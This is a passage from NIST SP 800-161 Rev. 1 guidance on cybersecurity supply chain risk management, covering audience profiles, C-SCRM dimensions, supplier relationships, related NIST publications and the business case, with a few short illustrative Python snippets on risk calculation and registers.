C-SCRM. However, this publication does not offer a specific roadmap for enterprises to follow
to reach various states of capability and maturity.
The processes and controls identified in this document can be modified or augmented with
enterprise-specific requirements from policies, guidelines, response strategies, and other sources.
This publication empowers enterprises to develop C-SCRM strategies tailored to their specific
mission and business needs, threats, and operational environments.
1.2. Target Audience
C-SCRM is an enterprise-wide activity that should be directed as such from a governance
perspective, regardless of the specific enterprise structure.
This publication is intended to serve a diverse audience involved in C-SCRM, including:
• Individuals with system, information security, privacy, or risk management and oversight
responsibilities, including authorizing officials (AOs), chief information officers, chief
information security officers, and senior officials for privacy;
• Individuals with system development responsibilities, including mission or business owners,
program managers, system engineers, system security engineers, privacy engineers, hardware
and software developers, system integrators, and acquisition or procurement officials;
• Individuals with project management-related responsibilities, including certified project
managers and/or integrated project team (IPT) members;
• Individuals with acquisition and procurement-related responsibilities, including acquisition
officials and contracting officers;
4 Refer to Section 3.4 of this publication.
• Individuals with logistical or disposition-related responsibilities, including program
managers, procurement officials, system integrators, and property managers;
• Individuals with security and privacy implementation and operations responsibilities,
including mission or business owners, system owners, information owners or stewards,
system administrators, continuity planners, and system security or privacy officers;
• Individuals with security and privacy assessment and monitoring responsibilities, including
auditors, Inspectors General, system evaluators, control assessors, independent verifiers and
validators, and analysts; and
• Commercial entities, including industry partners, that produce component products and
systems, create security and privacy technologies, or provide services or capabilities that
support information security or privacy.
1.3. Guidance for Cloud Service Providers
The external system service providers discussed in this publication include cloud service
providers. This publication does not replace the guidance provided with respect to federal agency
assessments of cloud service providers’ security. When applying this publication to cloud service
providers, federal agencies should first use Federal Risk and Authorization Management Program
(FedRAMP) cloud services security guidelines and then apply this document for those processes and controls
that are not addressed by FedRAMP.5
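
As a minimal illustration of this sequencing, the sketch below expresses the “FedRAMP first,
then this publication for the remainder” approach as set arithmetic. The control identifiers are a
hypothetical selection, not an actual FedRAMP baseline or C-SCRM control set.

    # Illustrative only: apply SP 800-161r1 processes and controls where
    # FedRAMP does not already address them. Identifiers are hypothetical.
    fedramp_addressed = {"AC-2", "AC-3", "SC-7", "SI-4"}
    cscrm_required = {"AC-3", "SC-7", "SR-3", "SR-5", "SR-6"}

    remaining = sorted(cscrm_required - fedramp_addressed)
    print("Apply from this publication:", ", ".join(remaining))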
1.4. Audience Profiles and Document Use Guidance
Given the wide audience of this publication, several reader profiles have been defined to point
readers to the sections of the document that most closely pertain to their use case. Some readers
will belong to multiple profiles and should consider reading all applicable sections. Any reader
accountable for the implementation of a C-SCRM capability or function within their enterprise,
regardless of role, should consider the entire document applicable to their use case.
1.4.1. Enterprise Risk Management and C-SCRM Owners and Operators
These readers are those responsible for enterprise risk management and cybersecurity supply
chain risk management. These readers may help develop C-SCRM policies and standards,
perform assessments of cybersecurity risks throughout the supply chain, and serve as subject
matter experts for the rest of the enterprise. The entire document is relevant to and recommended
for readers fitting this profile.
1.4.2. Enterprise, Agency, and Mission and Business Process Owners and Operators
These readers are the personnel responsible for the activities that create and/or manage risk
within the enterprise. They may also own the risk as part of their duties within the mission or
business process. They may have responsibilities for managing cybersecurity risks throughout
the supply chain for the enterprise. Readers in this group may seek general knowledge and
guidance on Cybersecurity Supply Chain Risk Management.
5 For cloud services, FedRAMP is applicable for low-, moderate-, high-impact systems [FedRAMP].
Recommended reading includes:
• Section 1: Introduction
• Section 2: Integration of C-SCRM into Enterprise-wide Risk Management
• Section 3.3: C-SCRM Awareness and Training
• Section 3.4: C-SCRM Key Practices
• Section 3.6: Dedicated Resources
• Appendix A: C-SCRM Security Controls
• Appendix B: C-SCRM Control Summary
• Appendix E: FASCSA
1.4.3. Acquisition and Procurement Owners and Operators
These readers are those with C-SCRM responsibilities as part of their role in the procurement or
acquisition function of an enterprise. Acquisition personnel may execute C-SCRM activities as a
part of their general responsibilities in the acquisition and procurement life cycle. These
personnel will collaborate closely with the enterprise’s C-SCRM personnel to execute C-SCRM
activities with acquisition and procurement. Recommended reading includes:
• Section 1: Introduction
• Section 2.1: The Business Case for C-SCRM
• Section 2.2: Cybersecurity Risks Throughout the Supply Chain
• Section 3.1: C-SCRM in Acquisition
• Section 3.3: C-SCRM Awareness and Training
• Appendix A: C-SCRM Security Controls
o These readers should pay special attention to requisite controls for supplier
contracts and include them in agreements with both primary and sub-tier
contractor parties.
• Appendix F: Software Supply Chain Security Guidelines
1.4.4. Information Security, Privacy, or Cybersecurity Operators
These readers are those with operational responsibility for protecting the confidentiality,
integrity, and availability of the enterprise’s critical processes and information systems. As part
of those responsibilities, these readers may find themselves directly or indirectly involved with
conducting Cybersecurity Supply Chain Risk Assessments and/or the selection and
implementation of C-SCRM controls. In smaller enterprises, these personnel may bear the
responsibility for implementing C-SCRM and should refer to Section 1.4.1 for guidance.
Recommended reading includes:
• Section 1: Introduction
• Section 2.1: The Business Case for C-SCRM
• Section 2.2: Cybersecurity Risks Throughout the Supply Chain
• Section 3.2: Supply Chain Information Sharing
• Section 3.4: C-SCRM Key Practices
• Appendix A: C-SCRM Security Controls
• Appendix B: C-SCRM Control Summary
• Appendix C: Risk Exposure Framework
• Appendix G: C-SCRM Activities in the Risk Management Process
• Appendix E: FASCSA
• Appendix F: Software Supply Chain Security Guidelines
1.4.5. System Development, System Engineering, and System Implementation Personnel
These readers are those with responsibilities for executing activities within an information
system’s system development life cycle (SDLC). As part of their SDLC responsibilities, these
readers will be responsible for the execution of operational-level C-SCRM activities.
Specifically, these personnel may be concerned with implementing C-SCRM controls to manage
cybersecurity risks that arise from products and services provided through the supply chain
within the scope of their information system(s). Recommended reading includes:
• Section 1: Introduction
• Section 2.1: The Business Case for C-SCRM
• Section 2.2: Cybersecurity Risks Throughout the Supply Chain
• Section 2.3.4: Level 3 - Operational
• Appendix A: C-SCRM Security Controls
• Appendix B: C-SCRM Control Summary
• Appendix C: Risk Exposure Framework
• Appendix F: Software Supply Chain Security Guidelines
• Appendix G: C-SCRM Activities in the Risk Management Process
1.5. Background
C-SCRM encompasses activities that span the entire SDLC, including research and development,
design, manufacturing, acquisition, delivery, integration, operations and maintenance, disposal,
and the overall management of an enterprise’s products and services. Enterprises should
integrate C-SCRM within the SDLC as this is a critical area for addressing cybersecurity risks
throughout the supply chain. C-SCRM is the organized and purposeful management of
cybersecurity risks throughout the supply chain. C-SCRM requires enterprise recognition and
awareness, and it lies at the intersections of security, suitability, safety, reliability, usability,
quality, integrity, efficiency, maintainability, scalability, and resilience, as depicted in Figure 1-
1. These dimensions are layers of consideration for enterprises as they approach C-SCRM and
should be positively impacted by C-SCRM.
Fig. 1-1: Dimensions of C-SCRM
• Culture and Awareness is the set of shared values, practices, goals, and attitudes of the
organization that set the stage for successful C-SCRM. It includes a learning process that
influences individual and enterprise attitudes and understanding to realize the importance
of C-SCRM and the adverse consequences of its failure.6
• Security provides the confidentiality, integrity, and availability of (a) information that
describes the supply chain (e.g., information about the paths of products and services,
both logical and physical); (b) information, products, and services that traverse the supply
chain (e.g., intellectual property contained in products and services); and/or (c)
information about the parties participating in the supply chain (anyone who touches a
product or service throughout its life cycle).
• Suitability is focused on the supply chain and the provided products and services being
right and appropriate for the enterprise and its purpose.
• Safety is focused on ensuring that the product or service is free from conditions that can
cause death, injury, occupational illness, damage to or loss of equipment or property, or
damage to the environment.7
• Reliability is focused on the ability of a product or service to function as defined for a
specified period of time in a predictable manner.8
6 NIST SP 800-16
7 NIST SP 800-160 Vol.2
8 NIST SP 800-160 Vol.2
• Usability is focused on the extent to which a product or service can be used by specified
users to achieve specified goals with effectiveness, efficiency, and satisfaction in a
specified context of use.9
• Quality is focused on meeting or exceeding performance, technical, and functional
specifications while mitigating vulnerabilities and weaknesses that may limit the intended
function of a component or delivery of a service, lead to component or service failure, or
provide opportunities for exploitation.
• Efficiency is focused on the timeliness of the intended result delivered by a product or
service.
• Maintainability is focused on the ease with which a product or service can accommodate
change and improvements based on past experience in support of expanding future derived
benefits.
• Integrity is focused on guarding products and the components of products against
improper modification or tampering and ensuring authenticity and pedigree.
• Scalability is the capacity of a product or service to handle increased growth and
demand.
• Resilience is focused on ensuring that a product, service, or the supply chain supports the
enterprise’s ability to prepare for and adapt to changing conditions and withstand and
recover rapidly from disruptions. Resilience includes the ability to withstand and recover
from deliberate attacks, accidents, or naturally occurring threats or incidents.
1.5.1. Enterprise’s Supply Chain
Contemporary enterprises run complex information systems and networks to support their
missions. These information systems and networks are composed of ICT/OT10 products and
components made available by suppliers, developers, and system integrators. Enterprises also
acquire and deploy an array of products and services, including:
• Custom software for information systems built to be deployed within the enterprise, made
available by developers;
• Operations, maintenance, and disposal support for information systems and networks
within and outside of the enterprise’s boundaries,11 made available by system integrators
or other ICT/OT-related service providers; and
• External services to support the enterprise’s operations that are positioned both inside and
outside of the authorization boundaries, made available by external system service
providers.
9 NIST SP 800-63-3
10 NIST SP 800-37, Rev. 2 defines Operational Technology as:
Programmable systems or devices that interact with the physical environment (or manage devices that interact with the physical
environment). These systems/devices detect or cause a direct change through the monitoring and/or control of devices, processes, and
events. Examples include industrial control systems, building management systems, fire control systems, and physical access control
mechanisms.
11 For federal information systems, this is the Authorization Boundary, defined in NIST SP 800-53, Rev. 5 as:
All components of an information system to be authorized for operation by an authorizing official. This excludes separately authorized
systems to which the information system is connected.
These services may span the entire SDLC for an information system or service and may be:
• Performed by the staff employed by the enterprise, developer, system integrator, or
external system service provider;
• Physically hosted by the enterprise, developer, system integrator, or external system
service provider;
• Supported by or composed of development environments, logistics/delivery environments
that transport information systems and components, or applicable system and
communications interfaces; and
• Proprietary, open source, or commercial off-the-shelf (COTS) hardware and software.
The responsibility and accountability for the services and associated activities performed by
different parties within this ecosystem are usually defined by agreement documents between the
enterprise and suppliers, developers, system integrators, external system service providers, and
other ICT/OT-related service providers.
1.5.2. Supplier Relationships Within Enterprises
Enterprises depend on the supply chain to provide a variety of products and services to enable
the enterprise to achieve its strategic and operational objectives. Identifying cybersecurity risks
throughout the supply chain is complicated by the information asymmetry that exists between
acquiring enterprises and their suppliers and service providers. Acquirers often lack visibility and
understanding of how acquired technology is developed, integrated, and deployed and how the
services that they acquire are delivered. Additionally, acquirers with inadequate or absent C-
SCRM processes, procedures, and practices may experience increased exposure to cybersecurity
risks throughout the supply chain. The level of exposure to cybersecurity risks throughout the
supply chain depends largely on the relationship between the products and services provided and
the criticality of the missions, business processes, and systems that they support. Enterprises
have a variety of relationships with their suppliers, developers, system integrators, external
system service providers, and other ICT/OT-related service providers. Figure 1-2 depicts how
these diverse relationships affect an enterprise’s visibility and control of the supply chain.
Fig. 1-2: An Enterprise’s Visibility, Understanding, and Control of its Supply Chain
Some supply chain relationships are tightly intermingled, such as a system integrator’s
development of a complex information system operating within the federal agency’s
authorization boundary or the management of federal agency information systems and resources
by an external service provider. These relationships are usually guided by an agreement (e.g.,
contract) that establishes detailed functional, technical, and security requirements and may
provide for the custom development or significant customization of products and services. For
these relationships, system integrators and external service providers are likely able to work with
the enterprise to implement such processes and controls (listed within this document) that are
deemed appropriate based on the results of a criticality and risk assessment and cost/benefit
analysis. This may include floating requirements upstream in the supply chain to ensure higher
confidence in the satisfaction of necessary assurance objectives. The decision to extend such
requirements must be balanced with an appreciation of what is feasible and cost-effective. The
degree to which system integrators and external service providers are expected to implement C-
SCRM processes and controls should be weighed against the risks to the enterprise posed by not
adhering to those additional requirements. Often, working directly with the system integrators
and external service providers to proactively identify appropriate mitigation processes and
controls will help create a more cost-effective strategy.
Procuring ICT/OT products from suppliers establishes a direct relationship between those
suppliers and the acquirers. This relationship is also usually guided by an agreement between the
acquirer and the supplier. However, commercial ICT/OT products developed by suppliers are
typically designed for general purposes for a global market and are not tailored to an individual
customer’s specific operational or threat environments. Enterprises should perform due diligence
and research regarding their specific C-SCRM requirements to determine if an IT solution is fit
for purpose,12 includes requisite security features and capabilities, will meet quality and
resiliency expectations, and requires support by the supplier for the product or product
components over its life cycle.
An assessment of the findings of an acquirer’s research about a product, which may include
engaging in direct dialogue with suppliers whenever possible, will help acquirers understand the
characteristics and capabilities of existing ICT/OT products and services, set expectations and
requirements for suppliers, and identify C-SCRM needs not yet satisfied by the market. It can
also help identify emerging solutions that may at least partially support the acquirer’s needs.
Overall, such research and engagement with a supplier will allow the acquirer to better articulate
their requirements to align with and drive market offerings and to make risk-based decisions
about product purchases, configurations, and usages within their environment.
Managing Cost and Resources
Balancing exposure to cybersecurity risks throughout the supply chain with the costs and
benefits of implementing C-SCRM practices and controls should be a key component of the
acquirer’s overall approach to C-SCRM.
Enterprises should be aware that implementing C-SCRM practices and controls necessitates
additional financial and human resources. Requiring a greater level of testing, documentation, or
security features from suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers may increase the price of a product or
service, which may result in increased cost to the acquirer. This is especially true for those
products and services developed for general-purpose applications and not tailored to the specific
enterprise security or C-SCRM requirements. When deciding whether to require and implement
C-SCRM practices and controls, acquirers should consider both the costs of implementing these
controls and the risks of not implementing them.
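
One common way to structure this comparison is annualized loss expectancy (ALE), a
quantification technique drawn from general risk management practice rather than defined in
this publication. The sketch below is illustrative only, and every figure in it is hypothetical.

    # Illustrative only: compare the cost of a control against the risk
    # reduction it buys, using annualized loss expectancy (ALE).
    def ale(single_loss_expectancy, annual_rate_of_occurrence):
        """ALE = expected loss per event x expected events per year."""
        return single_loss_expectancy * annual_rate_of_occurrence

    # Hypothetical figures for one supply chain risk scenario.
    ale_without_control = ale(500_000, 0.30)   # $150,000/yr
    ale_with_control = ale(500_000, 0.05)      # $25,000/yr
    annual_control_cost = 60_000

    risk_reduction = ale_without_control - ale_with_control
    net_benefit = risk_reduction - annual_control_cost
    print(f"Risk reduction: ${risk_reduction:,.0f}/yr")
    print(f"Net benefit of the control: ${net_benefit:,.0f}/yr")

A positive net benefit argues for requiring the control; a negative one argues for accepting,
transferring, or otherwise treating the risk.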
When possible and appropriate, acquirers should allow suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers the opportunity to
reuse applicable existing data and documentation that may provide evidence to support C-SCRM
(e.g., certification of a vendor to a relevant standard, such as ISO 27001). Doing this results in
cost savings to the acquirer and supplier. However, in some cases, documentation reuse may not
be appropriate as additional or different information may be needed, and a reassessment may be
required (e.g., previously audited supplier developing a new, not yet produced product).
Regardless, acquirers should identify and include security considerations early in the acquisition
process.
12 “Fit for purpose” is a term used to informally describe a process, configuration item, IT service, etc. that is capable of meeting its objectives or
service levels. Being fit for purpose requires suitable design, implementation, control, and maintenance. (Adapted from Information Technology
Infrastructure Library (ITIL) Service Strategy [ITIL Service Strategy].)
1.6. Methodology for Building C-SCRM Guidance Using NIST SP 800-39; NIST SP 800-37, Rev. 2; and NIST SP 800-53, Rev. 5
This publication applies the multilevel risk management approach of [NIST SP 800-39] by
providing C-SCRM guidance at the enterprise, mission, and operational levels. It also introduces
a navigational system for [SP 800-37, Rev. 2] allowing users to focus on relevant sections of this
publication more easily. Finally, it contains an enhanced overlay of specific C-SCRM controls,
building on [NIST SP 800-53, Rev. 5].
The guidance/controls contained in this publication are built on existing multidisciplinary
practices and are intended to increase the ability of enterprises to manage the associated
cybersecurity risks throughout the supply chain over the entire life cycle of systems, products,
and services. It should be noted that this publication gives enterprises the flexibility to either
develop stand-alone documentation (e.g., policies, assessment and authorization [A&A] plan,
and C-SCRM plan) for C-SCRM or to integrate it into existing agency documentation.
For individual systems, this guidance is recommended for use with information systems at all
impact categories, according to [FIPS 199]. The agencies may choose to prioritize applying this
guidance to systems at a higher impact level or to specific system components. Finally, this
document describes the development and implementation of C-SCRM Strategies and
Implementation Plans at the enterprise and mission and business levels of an
enterprise and a C-SCRM system plan at the operational level of an enterprise. A C-SCRM plan
at the operational level is informed by the cybersecurity supply chain risk assessments and
should contain C-SCRM controls tailored to specific agency mission and business needs,
operational environments, and/or implementing technologies.
Integration into the Risk Management Process
The processes in this publication should be integrated into the enterprise’s existing SDLCs and
enterprise environments at all levels of risk management processes and hierarchy (e.g.,
enterprise, mission, system), as described in [NIST SP 800-39]. Section 2 provides an overview
of the [NIST SP 800-39] risk management hierarchy and approach and identifies C-SCRM
activities in the risk management process. Appendix C builds on Section 2 of [NIST SP 800-39],
providing descriptions and explanations of ICT/OT SCRM activities. The structure of Appendix
C mirrors [NIST SP 800-39].
Implementing C-SCRM in the Context of SP 800-37, Revision 2
C-SCRM activities described in this publication are closely related to the Risk Management
Framework described in [NIST SP 800-37, Rev. 2]. Specifically, C-SCRM processes conducted
at the operational level should closely mirror and/or serve as inputs to those steps completed as
part of [NIST SP 800-37, Rev 2]. C-SCRM activities completed at Levels 1 and 2 should provide
inputs (e.g., risk assessment results) to the operational level and RMF-type processes, where
possible and applicable. Section 2 and Appendix C describe the linkages between C-SCRM and
[NIST SP 800-37, Rev. 2] in further detail.
1.7. Relationship to Other Publications and Publication Summary
This publication builds on the concepts promoted within other NIST publications and tailors
those concepts for use within Cybersecurity Supply Chain Risk Management. As a result of this
relationship, this publication inherits many of its concepts and looks to other NIST publications
to continue advancing base frameworks, concepts, and methodologies. Those NIST publications
include:
• NIST Cybersecurity Framework (CSF) Version 1.1: Voluntary guidance based on
existing standards, guidelines, and practices for organizations to better manage and
reduce cybersecurity risk. It was also designed to foster risk and cybersecurity
management communications among both internal and external organizational
stakeholders.
• FIPS 199, Standards for Security Categorization of Federal Information and
Information Systems: A standard for categorizing federal information and information
systems according to an agency’s level of concern for confidentiality, integrity, and
availability and the potential impact on agency assets and operations should their
information and information systems be compromised through unauthorized access, use,
disclosure, disruption, modification, or destruction.
• SP 800-30, Revision 1, Guide for Conducting Risk Assessments: Guidance for
conducting risk assessments of federal information systems and organizations, amplifying
the guidance in SP 800-39. Risk assessments carried out at all three tiers in the risk
management hierarchy are part of an overall risk management process that provides
senior leaders/executives with the information needed to determine appropriate courses of
action in response to identified risks.
• SP 800-37, Revision 2, Risk Management Framework for Information Systems and
Organizations: A System Life Cycle Approach for Security and Privacy: Describes the
Risk Management Framework (RMF) and provides guidelines for applying the RMF to
information systems and organizations. The RMF provides a disciplined, structured, and
flexible process for managing security and privacy risk that includes information security
categorization; control selection, implementation, and assessment; system and common
control authorizations; and continuous monitoring.
• SP 800-39, Managing Information Security Risk: Organization, Mission, and
Information System View: Provides guidance for an integrated, organization-wide
program for managing information security risk to organizational operations (i.e.,
mission, functions, image, and reputation), organizational assets, individuals, other
organizations, and the Nation resulting from the operation and use of federal information
systems.
• SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and
Organizations: Provides a catalog of security and privacy controls for information
systems and organizations to protect organizational operations and assets, individuals,
other organizations, and the Nation from a diverse set of threats and risks, including
hostile attacks, human errors, natural disasters, structural failures, foreign intelligence
entities, and privacy risks.
• SP 800-53B, Control Baselines for Information Systems and Organizations: Provides
security and privacy control baselines for the Federal Government. There are three
security control baselines – one for each system impact level (i.e., low-impact, moderate-
impact, and high-impact) – and a privacy baseline that is applied to systems irrespective
of impact level.
• SP 800-160 Vol. 1, Systems Security Engineering: Addresses the engineering-driven
perspective and actions necessary to develop more defensible and survivable systems,
inclusive of the machine, physical, and human components comprising the systems,
capabilities, and services delivered by those systems.
• SP 800-160 Vol. 2, Revision 1, Developing Cyber Resilient Systems: A Systems
Security Engineering Approach: A handbook for achieving identified cyber resiliency
outcomes based on a systems engineering perspective on system life cycle processes in
conjunction with risk management processes, allowing the experience and expertise of
the organization to help determine what is correct for its purpose.
• SP 800-181, Revision 1, National Initiative for Cybersecurity Education (NICE)
Cybersecurity Workforce Framework: A fundamental reference for describing and
sharing information about cybersecurity work. It expresses that work as Task statements
and describes Knowledge and Skill statements that provide a foundation for learners,
including students, job seekers, and employees.
• NISTIR 7622, Notional Supply Chain Risk Management Practices for Federal
Information Systems: Provides a wide array of practices that help mitigate supply chain
risk to federal information systems. It seeks to equip federal departments and agencies
with a notional set of repeatable and commercially reasonable supply chain assurance
methods and practices that offer a means to obtain an understanding of and visibility
throughout the supply chain.
• NISTIR 8179, Criticality Analysis Process Model: Prioritizing Systems and
Components: Helps organizations identify those systems and components that are most
vital and which may need additional security or other protections.
• NISTIR 8276, Key Practices in Cyber Supply Chain Risk Management: Observations
from Industry: Provides a set of Key Practices that any organization can use to manage
the cybersecurity risks associated with their supply chains. The Key Practices presented
in this document can be used to implement a robust C-SCRM function at an organization
of any size, scope, and complexity. These practices combine the information contained in
existing C-SCRM government and industry resources with the information gathered
during the 2015 and 2019 NIST research initiatives.
• NISTIR 8286, Integrating Cybersecurity and Enterprise Risk Management (ERM):
Helps individual organizations within an enterprise improve their cybersecurity risk
information, which they provide as inputs to their enterprise’s ERM processes through
communication and risk information sharing.
• NISTIR 8286A, Identifying and Estimating Cybersecurity Risk for Enterprise Risk
Management: Offers examples and information to illustrate risk tolerance, risk appetite,
and methods for determining risks in that context. To support the development of an
Enterprise Risk Register, this report describes the documentation of various scenarios
based on the potential impact of threats and vulnerabilities on enterprise assets.
Documenting the likelihood and impact of various threat events through cybersecurity
risk registers integrated into an enterprise risk profile helps to later prioritize and
communicate enterprise cybersecurity risk response and monitoring.
• NISTIR 8286B, Prioritizing Cybersecurity Risk for Enterprise Risk Management:
Provides detail regarding stakeholder risk guidance and risk identification and analysis.
This second publication describes the need for determining the priorities of each of those
risks in light of their potential impact on enterprise objectives, as well as options for
properly treating that risk. This report describes how risk priorities and risk response
information are added to the cybersecurity risk register (CSRR) in support of an overall
enterprise risk register. Information about the selection of and projected cost of risk
response will be used to maintain a composite view of cybersecurity risks throughout the
enterprise, which may be used to confirm and adjust risk strategy to ensure mission
success.
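
As an illustration of the register concepts described in the NISTIR 8286 series above, the
following Python sketch shows one hypothetical way to structure a cybersecurity risk register
(CSRR) entry that records likelihood, impact, priority, and risk response information. The field
names and scales are assumptions made for the example, not a schema defined by NIST.

    # Illustrative only: a hypothetical cybersecurity risk register (CSRR) entry.
    from dataclasses import dataclass

    @dataclass
    class RiskRegisterEntry:
        risk_id: str
        scenario: str          # threat exploiting a vulnerability
        likelihood: float      # probability of occurrence in the timeframe, 0-1
        impact: int            # degree of harm on the enterprise scale, 1-5
        priority: int          # rank relative to other register entries
        response_type: str     # accept, avoid, mitigate, or transfer
        response_cost: float   # projected cost of the selected response

    entry = RiskRegisterEntry(
        risk_id="SC-0042",
        scenario="Ransomware at a tier-3 supplier disrupts component deliveries",
        likelihood=0.2,
        impact=4,
        priority=1,
        response_type="mitigate",
        response_cost=75_000.0,
    )
    print(f"{entry.risk_id}: priority {entry.priority}, response {entry.response_type}")

Aggregating entries like this one into an enterprise risk profile supports the composite view of
cybersecurity risk described above.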
This publication also draws upon concepts and work from other regulations, government reports,
standards, guidelines, and best practices. A full list of those resources can be found in Appendix
H.
Key Takeaways13
The Supply Chain. ICT/OT relies on a globally distributed, interconnected supply chain
ecosystem that consists of public and private sector entities (e.g., acquirers, suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related
service providers).
Supply Chain Products and Services. Enterprises rely on the supply chain for products and
services that include systems and system components, open source and custom software,
operational support services, hosted systems and services, and the performance of system
support roles.
Supply Chain Benefits and Risk. This ecosystem offers benefits such as cost savings,
interoperability, rapid innovation, product feature variety, and the ability to choose between
competing vendors. However, the same mechanisms that provide those benefits might also
introduce a variety of cybersecurity risks throughout the supply chain (e.g., a supplier disruption
that causes a reduction in service levels and leads to dissatisfaction from the enterprise’s
customer base).
Cybersecurity Supply Chain Risk Management (C-SCRM). C-SCRM, as described in this
document, is a systematic process that aims to help enterprises manage cybersecurity risks
throughout the supply chain. Enterprises should identify, adopt, and tailor the practices described
in this document to best suit their unique strategic, operational, and risk context.
Scope of C-SCRM. C-SCRM encompasses a wide array of stakeholder groups that include
information security and privacy, system developers and implementers, acquisition,
procurement, legal, and HR. C-SCRM covers activities that span the entire system development
life cycle (SDLC), from initiation to disposal. In addition, identified cybersecurity risks
throughout the supply chain should be aggregated and contextualized as part of enterprise risk
management processes to ensure that the enterprise understands the total risk exposure of its
critical operations to different risk types (e.g., financial risk, strategic risk).
13 Key takeaways describe key points from the section text. Refer to the Glossary in Appendix H for definitions.
2. INTEGRATION OF C-SCRM INTO ENTERPRISE-WIDE RISK MANAGEMENT14
C-SCRM should be integrated into the enterprise-wide risk management process described in
[NIST SP 800-39] and depicted in Figure 2-1. This process includes the following continuous
and iterative steps:
• Frame risk. Establish the context for risk-based decisions and the current state of the
enterprise’s information and communications technology and services and the associated
supply chain.
• Assess risk. Review and interpret criticality, threat, vulnerability, likelihood,15 impact,
and related information.
• Respond to risk. Select, tailor, and implement mitigation controls based on risk
assessment findings.
• Monitor risk. Monitor risk exposure and the effectiveness of mitigating risk on an
ongoing basis, including tracking changes to an information system or supply chain using
effective enterprise communications and a feedback loop for continuous improvement.
Fig. 2-1: Risk Management Process
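
As a minimal illustration of the continuous, iterative character of these four steps, the Python
sketch below cycles through them, with monitoring feeding the next framing. The loop and its
placeholder step handling are schematic assumptions, not interfaces defined by NIST.

    # Illustrative only: the frame-assess-respond-monitor cycle as a loop.
    STEPS = ["frame", "assess", "respond", "monitor"]

    def run_cycle(context):
        """One pass through the four steps of one risk management cycle."""
        for step in STEPS:
            # In practice, each step produces artifacts (framing decisions,
            # assessment results, response selections, monitoring findings)
            # that feed the next step and the next cycle.
            context[step] = f"{step} completed in cycle {context['cycle']}"
        context["cycle"] += 1
        return context

    context = {"cycle": 1}
    for _ in range(2):  # the process repeats; it does not terminate
        context = run_cycle(context)
    print(context["monitor"])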
Managing cybersecurity risks throughout the supply chain is a complex undertaking that requires
cultural transformation and a coordinated, multidisciplinary approach across an enterprise.
Effective cybersecurity supply chain risk management (C-SCRM) requires engagement from
stakeholders inside the enterprise (e.g., departments, processes) and outside of the enterprise
(e.g., suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers) to actively collaborate, communicate, and take actions to
secure favorable C-SCRM outcomes. Successful C-SCRM requires an enterprise-wide cultural
shift to a state of heightened awareness and preparedness as to the potential ramifications of
cybersecurity risks throughout the supply chain.
14 Departments and agencies should refer to Appendix F to implement this guidance in accordance with Executive Order 14028, Improving the
Nation’s Cybersecurity.
15 For C-SCRM purposes, likelihood is defined as the probability of a threat exploiting a vulnerability within a given timeframe. It should be
noted that in mathematics, likelihood and probability are fundamentally different concepts, but the difference between the two is outside of the
scope of this publication.
Enterprises should aim to infuse perspectives from multiple disciplines and processes (e.g.,
information security, procurement, enterprise risk management, engineering, software
development, IT, legal, HR, etc.) into their approaches to managing cybersecurity risks
throughout the supply chain. Enterprises may define explicit roles to bridge and integrate these
processes as a part of an enterprise’s broader risk management activities. This orchestrated
approach is an integral part of an enterprise’s effort to identify C-SCRM priorities, develop
solutions, and incorporate C-SCRM into overall risk management decisions. Enterprises should
perform C-SCRM activities as a part of the acquisition, SDLC, and broader enterprise risk
management processes. Embedded C-SCRM activities involve determining the criticality of
functions and their dependency on the supplied products and services, identifying and assessing
applicable risks, determining appropriate mitigating actions, documenting selected risk response
actions, and monitoring performance of C-SCRM activities. As exposure to supply chain risk
differs across (and sometimes within) enterprises, business and mission-specific strategies and
policies should set the tone and direction for C-SCRM across the enterprise.
2.1. The Business Case for C-SCRM
Today, every enterprise heavily relies on digital technology to fulfill its business and mission.
Digital technology is composed of ICT/OT products and is delivered through and supported by
services. C-SCRM is a critical capability that every enterprise needs to have to address
cybersecurity risks throughout the supply chain that arise from the use of digital technology. The
depth, extent, and maturity of a C-SCRM capability for each enterprise should be based on the
uniqueness of its business or mission, enterprise-specific compliance requirements, operational
environment, risk appetite, and risk tolerance.
Establishing and sustaining a C-SCRM capability creates a number of significant benefits:
• An established C-SCRM program will enable enterprises to understand which critical
assets are most susceptible to supply chain weaknesses and vulnerabilities.
• C-SCRM reduces the likelihood of supply chain compromise by a cybersecurity threat
and enhances an enterprise’s ability to effectively detect, respond to, and recover from
events that result in significant business disruptions should a compromise occur.
• Operational and enterprise efficiencies are achieved through clear structure, purpose, and
alignment with C-SCRM capabilities and the prioritization, consolidation, and
streamlining of existing C-SCRM processes.
• There is greater assurance that acquired products are of high quality, authentic, reliable,
resilient, maintainable, secure, and safe.
• There is greater assurance that suppliers, service providers, and the technology products
and services that they provide are trustworthy and can be relied upon to meet performance
requirements.

Organizations should ensure that tailored C-SCRM plans are designed to:
• Manage rather than eliminate risk, as risk is integral to the pursuit of value;
• Ensure that operations are able to adapt to constantly emerging or evolving threats;
• Be responsive to changes within their own organization, programs, and the supporting
information systems; and
• Adjust to the rapidly evolving practices of the private sector’s global ICT supply
chain.
C-SCRM is fundamental to any effort to manage risk exposure arising from enterprise
operations. Implementing C-SCRM processes and controls requires human, tooling, and
infrastructure investments by acquirers and their developers, system integrators, external system
service providers, and other ICT/OT-related service providers. However, enterprises have finite
resources to commit to establishing and deploying C-SCRM processes and controls. As such,
enterprises should carefully weigh the potential costs and benefits when making C-SCRM
resource commitment decisions and make decisions based on a clear understanding of any risk
exposure implications that could arise from a failure to commit the necessary resources to C-
SCRM.
While there are cost-benefit trade-offs that must be acknowledged, the need to better secure
supply chains is an imperative for both government and the private sector. The passage of the
2018 SECURE Technology Act,16 the formation of the FASC, and the observations from the
2015 and 2019 Case Studies in Cyber Supply Chain Risk Management captured in NIST
Interagency or Internal Report (NISTIR) 8276, Key Practices in Cyber Supply Chain Risk
Management, point to a broad public and private sector consensus: C-SCRM capabilities are a
critical and foundational component of any enterprise’s risk posture.
2.2. Cybersecurity Risks Throughout Supply Chains
Cybersecurity risks throughout the supply chain refers to the potential for harm or compromise
that arises from the cybersecurity risks posed by suppliers, their supply chains, and their products
or services. Examples of these risks include:
• Insiders working on behalf of a system integrator steal sensitive intellectual property,
resulting in the loss of a major competitive advantage.17
• A proxy working on behalf of a nation-state inserts malicious software into supplier-
provided product components used in systems sold to government agencies. A breach
occurs and results in the loss of several government contracts.
• A system integrator working on behalf of an agency reuses vulnerable code, leading to a
breach of mission-critical data with national security implications.
